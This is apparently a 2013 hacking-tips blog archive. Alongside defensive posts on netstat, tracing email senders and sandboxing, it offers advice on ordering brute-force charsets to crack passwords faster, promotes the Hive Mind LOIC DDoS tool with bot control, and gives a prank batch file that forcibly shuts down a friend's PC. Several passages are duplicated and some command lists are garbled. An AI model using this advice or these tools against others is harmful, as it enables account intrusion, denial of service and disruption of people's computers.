This line tells me the IP address of the person who send me this email.
Received: from 209.124.87.14 (HELO org.pickepair.com) (209.124.87.14)
by mta189.mail.in.yahoo.com with SMTP; Wed, 12 Jun 2013 20:36:53 +0530
Again this line tells us the IP address of the person who sent this mail and contain some SMTP command which you will learn in the next lesson.
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"
MIME-Version: 1.0
This line tells me the software that the attacker used to send me the
message
Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"
This line tells me the type of the text the email used.
The header can be viewed by going to action in yahoo mail and in gmail it would be found in settings. If you use some other website then the best way is to find it using google. Now if you have got the IP address what can you do?
The answer is very simple you can just do a whois scan for that IP address.
Whois is a tool that has information about all the hosts.When I did a whois scan for the above IP address it reavels the following information:
Whois IP 209.124.87.14 | Updated 1 second ago |
# # ARIN WHOIS data and services are subject to the Terms of Use # available at: https://www.arin.net/whois_tou.html # # # The following results may also be obtained via: # http://whois.arin.net/rest/nets;q=209.124.87.14?showDetails=true&showARIN=false&ext=netref2 # # start NetRange: 209.124.64.0 - 209.124.95.255 CIDR: 209.124.64.0/19 OriginAS: NetName: DRAGON-BLK-1 NetHandle: NET-209-124-64-0-1 Parent: NET-209-0-0-0-0 NetType: Direct Allocation Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE RegDate: 1999-04-20 Updated: 2012-03-02 Ref: http://whois.arin.net/rest/net/NET-209-124-64-0-1 OrgName: Dragon Networks, Inc. OrgId: DRAGON-8 Address: 93, Moor Lane City: Wilmslow StateProv: Cheshire PostalCode: SK9 6BR Country: GB RegDate: 2002-05-19 Updated: 2012-06-21 Ref: http://whois.arin.net/rest/org/DRAGON-8 OrgAbuseHandle: ABUSE1150-ARIN OrgAbuseName: Abuse OrgAbusePhone: +1 404.300.9889 OrgAbuseEmail: @dragonnetwurx.com OrgAbuseRef: http://whois.arin.net/rest/poc/ABUSE1150-ARIN OrgNOCHandle: CTS4-ARIN OrgNOCName: Smith, Charles T OrgNOCPhone: +1 404-949-7884 OrgNOCEmail: @dragonnetwurx.com OrgNOCRef: http://whois.arin.net/rest/poc/CTS4-ARIN OrgTechHandle: ABUSE1150-ARIN OrgTechName: Abuse OrgTechPhone: +1 404.300.9889 OrgTechEmail: @dragonnetwurx.com OrgTechRef: http://whois.arin.net/rest/poc/ABUSE1150-ARIN # end # start NetRange: 209.124.87.0 - 209.124.87.15 CIDR: 209.124.87.0/28 OriginAS: AS22653 NetName: NET-209-124-87-0-1 NetHandle: NET-209-124-87-0-1 Parent: NET-209-124-64-0-1 NetType: Reassigned RegDate: 2013-04-26 Updated: 2013-04-26 Ref: http://whois.arin.net/rest/net/NET-209-124-87-0-1 OrgName: J. Eaton OrgId: JE-98 Address: PO Box 3109 # 22016 City: Houston StateProv: TX PostalCode: 77253-3109 Country: US RegDate: 2013-04-26 Updated: 2013-04-26 Ref: http://whois.arin.net/rest/org/JE-98 OrgAbuseHandle: ADMIN4210-ARIN OrgAbuseName: Administrator OrgAbusePhone: +1-760-683-4974 OrgAbuseEmail: @gmail.com OrgAbuseRef: http://whois.arin.net/rest/poc/ADMIN4210-ARIN OrgTechHandle: ADMIN4210-ARIN OrgTechName: Administrator OrgTechPhone: +1-760-683-4974 OrgTechEmail: @gmail.com OrgTechRef: http://whois.arin.net/rest/poc/ADMIN4210-ARIN # end # # ARIN WHOIS data and services are subject to the Terms of Use # available at: https://www.arin.net/whois_tou.html
iMacros
iMacros is an extension for the Mozilla Firefox, Google Chrome, and Internet Explorer web browsers which adds record and replay functionality similar to that found in web testing and form filler software. The macros can be combined and controlled via JavaScript. Demo macros and JavaScript code examples are included with the software. iMacros was developed by iOpus. First released in 2001, iMacros was the first macro recorder tool specifically designed and optimized for web browsers and form filling.
iMacros for Firefox and Chrome offers a feature known as social scripting. It allows users to share macros and scripts in a way that is similar to how they share bookmarks on the many social bookmarking websites. After creating a new macro, users can click just once to share it with their friends as a link, either by distributing the link via email and social bookmarking websites, or by embedding it in a website or blog for public access. Technically, this is accomplished by embedding the imacro and the controlling JavaScript inside a plain text link.
Along with the freeware version, iMacros is available as a proprietary commercial application, with additional features and support for web scripting, web scraping, internet server monitoring, and web testing. In addition to working with HTML pages, the commercial editions can automate Adobe Flash, Adobe Flex, Silverlight, and Java applets by using Directscreen and image recognition technology.
Advanced versions also contain a command-line interface and an application programming interface (API) to automate more complicated tasks and integrate with other programs or scripts. The iMacros API is called Scripting Interface. The Scripting Interface of the iMacros Scripting Edition is designed as a Component Object Model (COM) object and allows the user to remotely control (script) the iMacros Browser, Internet Explorer, and Firefox from any Windows programming or scripting language.
iMacros for Firefox and Chrome offers a feature known as social scripting. It allows users to share macros and scripts in a way that is similar to how they share bookmarks on the many social bookmarking websites. After creating a new macro, users can click just once to share it with their friends as a link, either by distributing the link via email and social bookmarking websites, or by embedding it in a website or blog for public access. Technically, this is accomplished by embedding the imacro and the controlling JavaScript inside a plain text link.
Along with the freeware version, iMacros is available as a proprietary commercial application, with additional features and support for web scripting, web scraping, internet server monitoring, and web testing. In addition to working with HTML pages, the commercial editions can automate Adobe Flash, Adobe Flex, Silverlight, and Java applets by using Directscreen and image recognition technology.
Advanced versions also contain a command-line interface and an application programming interface (API) to automate more complicated tasks and integrate with other programs or scripts. The iMacros API is called Scripting Interface. The Scripting Interface of the iMacros Scripting Edition is designed as a Component Object Model (COM) object and allows the user to remotely control (script) the iMacros Browser, Internet Explorer, and Firefox from any Windows programming or scripting language.
Labels:
browser,
firefox,
google chrome,
imacros,
internet explorer,
script
Friday, June 7, 2013
Track Down a Hacker
Sometimes, it's just not enough to simply know that there's a Trojan or Virus onboard. Sometimes you need to know exactly why that file is on-board, how it got there - but most importantly, who put it there.
By enumerating the attacker in the same way that they have enumerated the victim, you will be able to see the bigger picture and establish what you're up against.
By enumerating the attacker in the same way that they have enumerated the victim, you will be able to see the bigger picture and establish what you're up against.
Connections make the world go round
The computer world, at any rate. Every single time you open up a website, send an email or upload your webpages into cyberspace, you are connecting to another machine in order to get the job done. This, of course, presents a major problem, because this simple act is what allows malicious users to target a machine in the first place.
# How do these people find their victim?
Well, first of all, they need to get hold of the victim's IP Address. Your IP (Internet Protocol) address reveals your point of entry to the Internet and can be used in many ways to cause your online activities many, many problems. It may not reveal you by name, but it may be uniquely identifiable and it represents your digital ID while you are online (especially so if you're on a fixed IP / DSL etc).
With an IP address, a Hacker can find out all sorts of weird and wonderful things about their victim (as well as causing all kinds of other trouble, the biggest two being Portnukes/Trojans and the dreaded DoS ((Denial of Service)) attack). Some Hackers like to collect IP Addresses like badges, and like to go back to old targets, messing them around every so often. An IP address is incredibly easy to obtain - until recently, many realtime chat applications (such as MSN) were goldmines of information. Your IP Address is contained as part of the Header Code on all emails that you send and webpages that you visit can store all kinds of information about you.
A common trick is for the Hacker to go into a Chatroom, paste his supposed website address all over the place, and when the unsuspecting victim visits, everything about your computer from the operating system to the screen resolution can be logged...and, of course, the all important IP address. In addition, a simple network-wide port scan will reveal vulnerable target machines, and a war-dialler will scan thousands of lines for exposed modems that the hacker can exploit.
So now that you know some of the basic dangers, you're probably wondering how these people connect to a victim's machine?
Virtual and Physical Ports
Everything that you recieve over the Internet comes as a result of other machines connecting to your computer's ports. You have two types; Physical are the holes in the back of your machine, but the important ones are Virtual. These allow transfer of data between your computer and the outside world, some with allocated functions, some without, but knowing how these work is the first step to discovering who is attacking you; you simply MUST have a basic knowledge of this, or you won't get much further.What the phrases TCP/UDP actually mean?
TCP/IP stands for Transmission Control Protocol and Internet Protocol, a TCP/IP packet is a block of data which is compressed, then a header is put on it and it is sent to another computer (UDP stands for User Datagram Protocol). This is how ALL internet transfers occur, by sending packets. The header in a packet contains the IP address of the one who originally sent you it. Now, your computer comes with an excellent (and free) tool that allows you to see anything that is connected (or is attempting to connect) to you, although bear in mind that it offers no blocking protection; it simply tells you what is going on, and that tool is NETSTAT.
Netstat: Your first line of defence
Netstat is a very fast and reliable method of seeing exactly who or what is connected (or connecting) to your computer. Open up DOS (Start/Programs/MS-DOS Prompt on most systems), and in the MSDOS Prompt, type:
netstat -a
(make sure you include the space inbetween the "t" and the "a").
If you're connected to the Internet when you do this, you should see something like:
Active Connections
Proto Local Address Foreign Address State
TCP macintosh: 20034 modem-123.tun.dialup.co.uk: 50505 ESTABLISHED
TCP macintosh: 80 proxy.webcache.eng.sq: 30101 TIME_WAIT
TCP macintosh MACINTOSH: 0 LISTENING
TCP macintosh MACINTOSH: 0 LISTENING
TCP macintosh MACINTOSH: 0 LISTENING
Now, "Proto(col)" simply means what kind of data transmission is taking place (TCP or UDP), "Local address" is your computer (and the number next to it tells you what port you're connected on), "Foreign Address" is the machine that is connected to you (and what port they're using), and finally "State" is simply whether or not a connection is actually established, or whether the machine in question is waiting for a transmission, or timing out etc.
Now, you need to know all of Netstat's various commands, so type:
netstat ?
You will get something like this:
Displays protocol statistics and current TCP/IP network connections.
NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]
-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto may be TCP or UDP. If used with the -s option to display per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the -p option may be used to specify a subset of the default.
Have a play around with the various options, but the most important use of these methods is when you combine them. The best command to use is
netstat -an
because this will list all connections in Numerical Form, which makes it a lot easier to trace malicious users....Hostnames can be a little confusing if you don't know what you're doing (although they're easily understandable, as we shall see later). Also, by doing this, you can also find out what your own IP address is, which is always useful.
Also,
netstat -b
will tell you what ports are open and what programs are connecting to the internet.
Types of Port
It would be impossible to find out who was attacking you if computers could just access any old port to perform an important function; how could you tell a mail transfer from a Trojan Attack? Well, good news, because your regular, normal connections are assigned to low, commonly used ports, and in general, the higher the number used, the more you should be suspicious. Here are the three main types of port:
# Well Known Ports These run from 0 to 1023, and are bound to the common services that run on them (for example, mail runs on channel 25 tcp/udp, which is smtp (Simple Mail Transfer Protocol) so if you find one of these ports open (and you usually will), it's usually because of an essential function.
# Registered Ports These run on 1024 to 49151. Although not bound to a particular service, these are normally used by networking utilities like FTP software, Email client and so on, and they do this by opening on a random port within this range before communicating with the remote server, so don't panic (just be wary, perhaps) if you see any of these open, because they usually close automatically when the system that's running on them terminates (for example, type in a common website name in your browser with netstat open, and watch as it opens up a port at random to act as a buffer for the remote servers). Services like MSN Messenger and ICQ usually run on these Ports.
# Dynamic/Private Ports Ranging from 49152 to 65535, these things are rarely used except with certain programs, and even then not very often. This is indeed the usual range of the Trojan, so if you find any of these open, be very suspicious. So, just to recap:
Well Known Ports 0 to 1023 Commonly used, little danger.
Registered Ports 1024 to 49151 Not as common, just be careful.
Dynamic/Private Ports 49152 to 65535 Be extremely suspicious.
The hunt is on
Now, it is essential that you know what you're looking for, and the most common way someone will attack your machine is with a Trojan. This is a program that is sent to you in an email, or attempts to bind itself to one of your ports, and when activated, it can give the user your passwords, access to your hard drive...they can even make your CD Tray pop open and shut. At the end of this Document, you will find a list of the most commonly used Trojans and the ports they operate on. For now, let's take another look at that first example of Netstat....
Active Connections
Proto Local Address Foreign Address State
TCP macintosh: 27374 modem-123.tun.dialup.co.uk: 50505 ESTABLISHED
TCP macintosh: 80 proxy.webcache.eng.sq: 30101 TIME_WAIT
TCP macintosh MACINTOSH: 0 LISTENING
TCP macintosh MACINTOSH: 0 LISTENING
TCP macintosh MACINTOSH: 0 LISTENING
Now, straight away, this should make more sense to you. Your computer is connected on two ports, 80 and 27374. Port 80 is used for http/www transmissions (ie for all intents and purposes, its how you connect to the net, although of course it's a lot more complicated than that). Port 27374, however, is distinctly suspicious; first of all, it is in the registered port range, and although other services (like MSN) use these, let's assume that you have nothing at all running like instant messengers, webpages etc....you're simply connected to the net through proxy.
So, now this connection is looking even more troublesome, and when you realise that 27374 is a common port for Netbus (a potentially destructive Trojan), you can see that something is untoward here. So, what you would do is:
1) run Netstat , and use:
Netstat -a
then
Netstat -an
So you have both Hostnames AND IP addresses.
Tracerouting
Having the attacker's IP is all well and good, but what can you do with it? The answer is, a lot more! It's not enough to have the address, you also need to know where the attacker's connections are coming from. You may have used automated tracerouting tools before, but do you jknow how they work?
Go back to MSDOS and type
tracert *type IP address/Hostname here*
Now, what happens is, the Traceroute will show you all the computers inbetween you and the target machine, including blockages, firewalls etc. More often than not, the hostname address listed before the final one will belong to the Hacker's ISP Company. It'll either say who the ISP is somewhere in there, or else you run a second trace on the new IP/hostname address to see who the ISP Company in question is.
If the Hostname that you get back doesn't actually seem to mention an actual geographical location within its text, you may think all is lost. But fear not! Suppose you get a hostname such as
http://www.haha.com
Well, that tells us nothing, right? Wrong....simply enter the hostname in your browser, and though many times you will get nothing back, sometimes it will resolve to an ISP, and from there you can easily find out its location and in what areas they operate. This at least gives you a firm geographical location to carry out your investigations in.
If you STILL have nothing, as a last resort you COULD try connecting to your target's ISP's port 13 by Telnet, which will tell you how many hours ahead or behind this ISP is of GMT, thus giving you a geographical trace based on the time mentioned (although bear in mind, the ISP may be doing something stupid like not having their clocks set correctly, giving you a misleading trace. Similarly, a common tactic of Hackers is to deliberately have their computer's clock set to a totally wrong time, so as to throw you off the scent). Also, unless you know what you're doing, I wouldn't advise using Telnet (which is outside the parameters of this tutorial).
Reverse DNS Query
This is probably the most effective way of running a trace on somebody. If ever you're in a chatroom and you see someone saying that they've "hacked into a satellite orbiting the Earth, and are taking pictures of your house right now", ignore them because that's just bad movie nonsense. THIS method is the way to go, with regard to finding out what country (even maybe what State/City etc) someone resides, although it's actually almost impossible to find an EXACT geographical location without actually breaking into your ISP's Head Office and running off with the safe.
To run an rDNS query, simply go back to MS-DOS and type
netstat and hit return. Any active connections will resolve to hostnames rather than a numerical format.
DNS
DNS stands for Domain Name Server. These are machines connected to the Internet whose job it is to keep track of the IP Addresses and Domain Names of other machines. When called upon, they take the ASCII Domain Name and convert it to the relevant numeric IP Address. A DNS search translates a hostname into an IP address....which is why we can enter "www.Hotmail.com" and get the website to come up, instead of having to actually remember Hotmail's IP address and enter that instead. Well, Reverse DNS, of course, translates the IP Address into a Hostname (ie - in letters and words instead of numbers, because sometimes the Hacker will employ various methods to stop Netstat from picking up a correct Hostname).
So, for example,
298.12.87.32 is NOT a Hostname.
mail6.bol.net.au IS a Hostname.
Anyway, see the section at the end? (au) means the target lives in Australia. Most (if not all) hostnames end in a specific Country Code, thus narrowing down your search even further. If you know your target's Email Address (ie they foolishly sent you a hate mail, but were silly enough to use a valid email address) but nothing else, then you can use the Country codes to deduce where they're from as well.
You can also deduce the IP address of the sender by looking at the emails header (a "hidden" line of code which contains information on the sender)...on Hotmail for example, go to Preferences, and select the "Full Header's Visible" option. Alternatively, you can run a "Finger" Trace on the email address, at:
www.samspade.org
Plus, some ISP's include their name in your Email Address with them too (ie Wanadoo, Supanet etc), and your Hacker may be using an email account that's been provided by a Website hosting company, meaning this would probably have the website host's name in the email address (ie Webspawners). So, you could use the information gleaned to maybe even hunt down their website (then you could run a website check as mentioned previously) or report abuse of that Website Provider's Email account (and thus, the Website that it goes with) to
abuse@companynamegoeshere.com
FTP Error Codes
FTP Error Messages
Some nice info about ftp error codes so you know what they mean. I am sure you see them all the time and sometimes you dont know what they mean, so take a look here.The most common codes:
421 - often means: too many users logged to the same account.530 - wrong login pass, some servers auto-switch to 530 from
421 when they reach the max # of users. so notice the error message attached to the code.
550 - common in Ratio site, If the file exsist it means you have no access to the file or dir.
If you try changing directories in an FTP and you`re getting a 550
message, it means you don`t have access to the directory.
It doesn`t mean you don`t have access to a directory inside that directory. (Meaning when getting a direct path, log into
the path directly, not 1 directory by 1).
All others:
110 Restart marker reply. In this case, the text is exact and not left to the particular implementation; it must read: MARK yyyy = mmmm Where yyyy is User-process data stream marker, and mmmm server's equivalent marker (note the spaces between markers and "=").120 Service ready in nnn minutes.
125 Data connection already open; transfer starting.
150 File status okay; about to open data connection.
200 Command okay.
202 Command not implemented, superfluous at this site.
211 System status, or system help reply.
212 Directory status.
213 File status.
214 Help message. On how to use the server or the meaning of a particular non-standard command. This reply is useful only to the human user.
215 NAME system type. Where NAME is an official system name from the list in the Assigned Numbers document.
220 Service ready for new user.
221 Service closing control connection. Logged out if appropriate.
225 Data connection open; no transfer in progress.
226 Closing data connection. Requested file action successful (for example, file transfer or file abort).
227 Entering Passive Mode (h1,h2,h3,h4,p1,p2).
230 User logged in, proceed.
250 Requested file action okay, completed.
257 "PATHNAME" created.
331 User name okay, need password.
332 Need account for login.
350 Requested file action pending further information.
421 Too many users logged to the same account
425 Can't open data connection.
426 Connection closed; transfer aborted.
450 Requested file action not taken. File unavailable (e.g., file busy).
451 Requested action aborted: local error in processing.
452 Requested action not taken. Insufficient storage space in system.
500 Syntax error, command unrecognized. This may include errors such as command line too long.
501 Syntax error in parameters or arguments.
502 Command not implemented.
503 Bad sequence of commands.
504 Command not implemented for that parameter.
530 Not logged in.
532 Need account for storing files.
550 Requested action not taken. File unavailable (e.g., file not found, no access).
551 Requested action aborted: page type unknown.
552 Requested file action aborted. Exceeded storage allocation (for current directory or dataset).
553 Requested action not taken. File name not allowed.
Thursday, June 6, 2013
Sand Box
What is sand box?
sandbox is a security mechanism for separating running programs. It is often used to execute untested code, or untrusted programs from unverified third-parties, suppliers, untrusted users and untrusted websites.The sandbox typically provides a tightly controlled set of resources for guest programs to run in, such as scratch space on disk and memory. Network access, the ability to inspect the host system or read from input devices are usually disallowed or heavily restricted.
Sandboxie
Sandboxie runs your programs in an isolated space which prevents them from making permanent changes to other programs and data in your computer.
The red arrows indicate changes flowing from a running program into your computer. The box labeled Hard disk (no sandbox) shows changes by a program running normally. The box labeled Hard disk (with sandbox) shows changes by a program running under Sandboxie. The animation illustrates that Sandboxie is able to intercept the changes and isolate them within a sandbox, depicted as a yellow rectangle. It also illustrates that grouping the changes together makes it easy to delete all of them at once.
Benefits of the Isolated Sandbox
- Secure Web Browsing: Running your Web browser under the protection of Sandboxie means that all malicious software downloaded by the browser is trapped in the sandbox and can be discarded trivially.
- Enhanced Privacy: Browsing history, cookies, and cached temporary files collected while Web browsing stay in the sandbox and don't leak into Windows.
- Secure E-mail: Viruses and other malicious software that might be hiding in your email can't break out of the sandbox and can't infect your real system.
- Windows Stays Lean: Prevent wear-and-tear in Windows by installing software into an isolated sandbox.
Tuesday, June 4, 2013
Types Of Hackers
Hacker: people who access a computer resource, without authorization, uses his or her skills to commit unlawful acts, or to deliberately create mischief.
There are six types of hackers:
There are six types of hackers:
- CODERS
- ADMINS
- SCRIPT KIDDIES
- WHITE HAT
- BLACK HAT
- GREY HAT
CODERS
The Real Hackers are the Coders, the ones who revise the methods and create tools that are available in the market. Coders can find security holes and weaknesses such as buffer overflow in software to create their own exploits.
ADMINS
Admins are the computer guys who use the tools and exploits prepared by the coders. They do not develop their own techniques, however they uses the tricks which are already prepared by the coders. They are generally System Administration, or Computer Network Controller. Most of the Hackers and security person in this digital world come under this category.
SCRIPT KIDDIES
Script Kiddies are the bunnies who use script and programs developed by others to attack computer systems and Networks. They get the least respect but are most annoying and dangerous and can cause big problems without actually knowing what they are doing.
WHITE HAT
A White Hat Hacker is computer guy who perform Ethical Hacking. These are usually security professionals with knowledge of hacking and the Hacker tool set and who use this knowledge to locate security weaknesses and implement counter measures in the resources. They are also known as an Ethical Hacker or a Penetration Tester. They focus on Securing and Protecting IT systems.
BLACK HAT
A Hacker is computer guy who performs Unethical Hacking. These are the Criminal Hackers or Crackers who use their skills and knowledge for illegal or malicious purposes. They break into or otherwise violate the system integrity of remote machines, with malicious intent. These are also known as an Unethical Hacker or a Security Cracker. They focus on Security Cracking and Data stealing.
GREY HAT
A Grey Hat Hacker is a Computer guy who sometimes acts legally, sometimes in good will, and sometimes not. They usually do not hack for personal gain or have malicious intentions, but may or may not occasionally commit crimes during the course of their technological exploits.They are hybrid between White Hat and Black Hat Hackers.
Common Run Command
compmgmt.msc = computer management
certmgr.msc = certificate manager
diskmgmt.msc = disk management
devmgmt.msc = device manager
eventvwr.msc = event viewer
fsmgmt.msc = share folder manager
gpedit.msc = group policy editor
lusrmgr.msc = local users and groups
ntmsmgr.msc = removable storage
ntmsoprq.msc = removable storage operator requests
perfmon.msc = performance monitor
rsop.msc = resultant set of policy
secpol.msc = local security settings
services.msc = services
wmimgmt.msc = windows management instrumentation
conf = netmeeting
calc = calculator
clipbrd = clipbook viewer
charmap = character mapping table
chkdsk.exe = check disk
cmd = command prompt
cleanmgr = clean disk
dxdiag = check DirectX information
dcomcnfg = component services
eudcedit = private character editor
logoff = logoff
mem.exe = memory usage
msconfig.exe = system configuration
mplayer2 = windows media player
mspaint = paint
mstsc = remote desktop
magnify = magnify
mmc = microsoft management console
mobsync = synchronize setting
notepad = notepad
ntbackup = backup or restore wizard
narrator = narrator
osk = on screen keyboard
odbcad32 = ODBC data source administrator
packager = object packager
regedit.exe = registry
rononce -p = shutdown (15secs)
regedt32 = registry editor
sysedit = system configuration editor
sigverif = file signature verification
sndrec32 = sound recorder
shrpubw = create shared folder wizard
syskey = encrypt windows
Sndvol32 = volume control
sfc.exe = resource checker
tsshutdn = shutdown (60secs)
taskmgr = task manager
tourstart = xp tour
utilman = ease of access center
winchat = windows chat
winver = check windows version
winmsd = check system information
wupdmgr = windows update manager
wscript = windows script host
write = word pad
Control
Control userpasswords2
Control access.cpl
Control appwiz.cpl
Control bthprops.cpl
Control desk.cpl
Control hdwwiz.cpl
Control inetcpl.cpl
Control firewall.cpl
Control intl.cpl
Control irprops.cpl
Control joy.cpl
Control main.cpl
Control mmsys.cpl
Control ncpa.cpl
Control netsetup.cpl
Control nusrmgr.cpl
Control nvtuicpl.cpl
Control odbccp32.cpl ODBC
Control powercfg.cpl
Control sysdm.cpl
Control telephon.cpl
Control timedate.cpl
Control wscui.cpl Windows
Control wuaucpl.cpl
shell:Common Administrative Tools
shell:Administrative Tools
shell:SystemX86 System32
shell:My Pictures
shellrofile %userprofile%
shell:CommonProgramFiles
shellrogramFiles %programfiles%
shell:System
shell:Windows %windir%
shell:History
shell:Cookies
shellocal AppData
shell:AppData
shell:Common Documents
shell:Common Templates
shell:Common AppData
shell:Common Favorites
shell:Common Desktop
shell:Common Menu
shell:Common Programs
shell:Common Startup
shell:Templates
shellrintHood
shell:NetHood
shell:Favorites
shellersonal
shell:SendTo
shell:Recent
shell:Menu
shellrograms
shell:Startup
shellesktop
shell:Fonts
shell:ConnectionsFolder
shell:RecycleBinFolder
shellrintersFolder
shell:ControlPanelFolder Control
shell:InternetFolder
shellriveFolder
shell:NetworkFolder
shellesktopFolder
certmgr.msc = certificate manager
diskmgmt.msc = disk management
devmgmt.msc = device manager
eventvwr.msc = event viewer
fsmgmt.msc = share folder manager
gpedit.msc = group policy editor
lusrmgr.msc = local users and groups
ntmsmgr.msc = removable storage
ntmsoprq.msc = removable storage operator requests
perfmon.msc = performance monitor
rsop.msc = resultant set of policy
secpol.msc = local security settings
services.msc = services
wmimgmt.msc = windows management instrumentation
conf = netmeeting
calc = calculator
clipbrd = clipbook viewer
charmap = character mapping table
chkdsk.exe = check disk
cmd = command prompt
cleanmgr = clean disk
dxdiag = check DirectX information
dcomcnfg = component services
eudcedit = private character editor
logoff = logoff
mem.exe = memory usage
msconfig.exe = system configuration
mplayer2 = windows media player
mspaint = paint
mstsc = remote desktop
magnify = magnify
mmc = microsoft management console
mobsync = synchronize setting
notepad = notepad
ntbackup = backup or restore wizard
narrator = narrator
osk = on screen keyboard
odbcad32 = ODBC data source administrator
packager = object packager
regedit.exe = registry
rononce -p = shutdown (15secs)
regedt32 = registry editor
sysedit = system configuration editor
sigverif = file signature verification
sndrec32 = sound recorder
shrpubw = create shared folder wizard
syskey = encrypt windows
Sndvol32 = volume control
sfc.exe = resource checker
tsshutdn = shutdown (60secs)
taskmgr = task manager
tourstart = xp tour
utilman = ease of access center
winchat = windows chat
winver = check windows version
winmsd = check system information
wupdmgr = windows update manager
wscript = windows script host
write = word pad
Control
Control userpasswords2
Control access.cpl
Control appwiz.cpl
Control bthprops.cpl
Control desk.cpl
Control hdwwiz.cpl
Control inetcpl.cpl
Control firewall.cpl
Control intl.cpl
Control irprops.cpl
Control joy.cpl
Control main.cpl
Control mmsys.cpl
Control ncpa.cpl
Control netsetup.cpl
Control nusrmgr.cpl
Control nvtuicpl.cpl
Control odbccp32.cpl ODBC
Control powercfg.cpl
Control sysdm.cpl
Control telephon.cpl
Control timedate.cpl
Control wscui.cpl Windows
Control wuaucpl.cpl
shell:Common Administrative Tools
shell:Administrative Tools
shell:SystemX86 System32
shell:My Pictures
shellrofile %userprofile%
shell:CommonProgramFiles
shellrogramFiles %programfiles%
shell:System
shell:Windows %windir%
shell:History
shell:Cookies
shellocal AppData
shell:AppData
shell:Common Documents
shell:Common Templates
shell:Common AppData
shell:Common Favorites
shell:Common Desktop
shell:Common Menu
shell:Common Programs
shell:Common Startup
shell:Templates
shellrintHood
shell:NetHood
shell:Favorites
shellersonal
shell:SendTo
shell:Recent
shell:Menu
shellrograms
shell:Startup
shellesktop
shell:Fonts
shell:ConnectionsFolder
shell:RecycleBinFolder
shellrintersFolder
shell:ControlPanelFolder Control
shell:InternetFolder
shellriveFolder
shell:NetworkFolder
shellesktopFolder
Monday, June 3, 2013
Enhance Brute Force Attack Charset
Choosing a custom charset of 0123456789abcdefghijklmnopqrstuvwxyz you'll get passwords much faster than the standard a-z0-9 charset. With a charset of a-z0-9, password cracking program will tries aaaaaaa baaaaaa caaaaaa and so on.
But with 0-9a-z, program will try 00000000 10000000 2000000 and so on - so you'll get the passwords with numbers at the end first. In other words, whereas the default numbers-last charsets will only reach the passwords with numbers at the end after almost the maximum time, a custom charset with numbers first will start with passwords with numbers at the end. It's not much but I find it does help.
Another common technique is use eatoinsrhldcumfpgwybvkxjqz instead abcdefghijklmnopqrstuvwxyz.
Everyone knows that 'e' is the most commonly used letter in the english language, so it makes sense to try it before the less commonly used letters. In fact, 'j', 'q' and 'z' are so uncommon, I sometimes leave them off the list altogether since it makes such a significant improvement on cracking time.
But with 0-9a-z, program will try 00000000 10000000 2000000 and so on - so you'll get the passwords with numbers at the end first. In other words, whereas the default numbers-last charsets will only reach the passwords with numbers at the end after almost the maximum time, a custom charset with numbers first will start with passwords with numbers at the end. It's not much but I find it does help.
Another common technique is use eatoinsrhldcumfpgwybvkxjqz instead abcdefghijklmnopqrstuvwxyz.
Everyone knows that 'e' is the most commonly used letter in the english language, so it makes sense to try it before the less commonly used letters. In fact, 'j', 'q' and 'z' are so uncommon, I sometimes leave them off the list altogether since it makes such a significant improvement on cracking time.
Sunday, June 2, 2013
Google Hacks
Almost all the internet user would recognize one of the popular search engine, the "GOOGLE". By utilizing various search operator that already provided in Google Search Engine, we could make our search result become more accurate. Therefore, an application named "Google Hacks" appear to help users to facilitate the search function of Google.
What is Google Hack? Google Hacks is an open source application that can be used as an aid in searching through Google. Search music, ebooks, videos, product key, the lyrics, the font is part of the basic search function to do with this program. Enter keywords and click the options provided, then Google Hacks will weave keywords with search operators and displays Google results pages through the browser. If we are lucky, we will get what we are looking for.
DOWNLOAD HERE
What is Google Hack? Google Hacks is an open source application that can be used as an aid in searching through Google. Search music, ebooks, videos, product key, the lyrics, the font is part of the basic search function to do with this program. Enter keywords and click the options provided, then Google Hacks will weave keywords with search operators and displays Google results pages through the browser. If we are lucky, we will get what we are looking for.
DOWNLOAD HERE
Friday, May 31, 2013
HIVE MIND LOIC
Hive Mind LOIC is a version of the Low Ordbit Ion Cannon made by Praetox, which was adapted for centralized control by NewEraCracker, when the project was then taken on by me. The amongst a few fixes I added RSS control (Such as via Twitter). - Urijah
- Stress test your servers against a DDoS attack
- Control your bots via an IRC channel or an RSS server
- Minimize the application to systray
Official Website: Hive Mind LOIC
Download : HERE
Thursday, May 30, 2013
Ways To Access Blocked WebSite
This summary is not available. Please
click here to view the post.
Tuesday, May 28, 2013
Shutdown PC
Make use of shutdown.exe in windows and prank your friends.
- Create a shortcut by right click on the desktop, then point your mouse to new and select shortcut.
- Type/Paste the following code in the shortcut.
- C:\Windows\System32\shutdown.exe -s -t 60 -c " message "
- -s is to shutdown computer | -t is to set time (seconds) | -c is to set message
- Simple replace 60 for any seconds you like and remember to put some scary message for your friend.
Notepad Version
Copy the following code into notepad:
@echo off
msg * I don't like you
shutdown -s -t 60 -c "Error! You are too stupid!"
Save as Hackmimic_shutdown.bat
Updates:
Search this blog for autorun script and automate it.
Full options for shutdown command
No args Display help. This is the same as typing /?.
/? Display help. This is the same as not typing any options.
/i Display the graphical user interface (GUI).
This must be the first option.
/l Log off. This cannot be used with /m or /d options.
/s Shutdown the computer.
/r Full shutdown and restart the computer.
/g Full shutdown and restart the computer. After the system is
rebooted, restart any registered applications.
/a Abort a system shutdown.
This can only be used during the time-out period.
/p Turn off the local computer with no time-out or warning.
Can be used with /d and /f options.
/h Hibernate the local computer.
Can be used with the /f option.
/hybrid Performs a shutdown of the computer and prepares it for fast startup.
Must be used with /s option.
/e Document the reason for an unexpected shutdown of a computer.
/o Go to the advanced boot options menu and restart the computer.
Must be used with /r option.
/m \\computer Specify the target computer.
/t xxx Set the time-out period before shutdown to xxx seconds.
The valid range is 0-315360000 (10 years), with a default of 30.
If the timeout period is greater than 0, the /f parameter is
implied.
/c "comment" Comment on the reason for the restart or shutdown.
Maximum of 512 characters allowed.
/f Force running applications to close without forewarning users.
The /f parameter is implied when a value greater than 0 is
specified for the /t parameter.
/d [p|u:]xx:yy Provide the reason for the restart or shutdown.
p indicates that the restart or shutdown is planned.
u indicates that the reason is user defined.
If neither p nor u is specified the restart or shutdown is
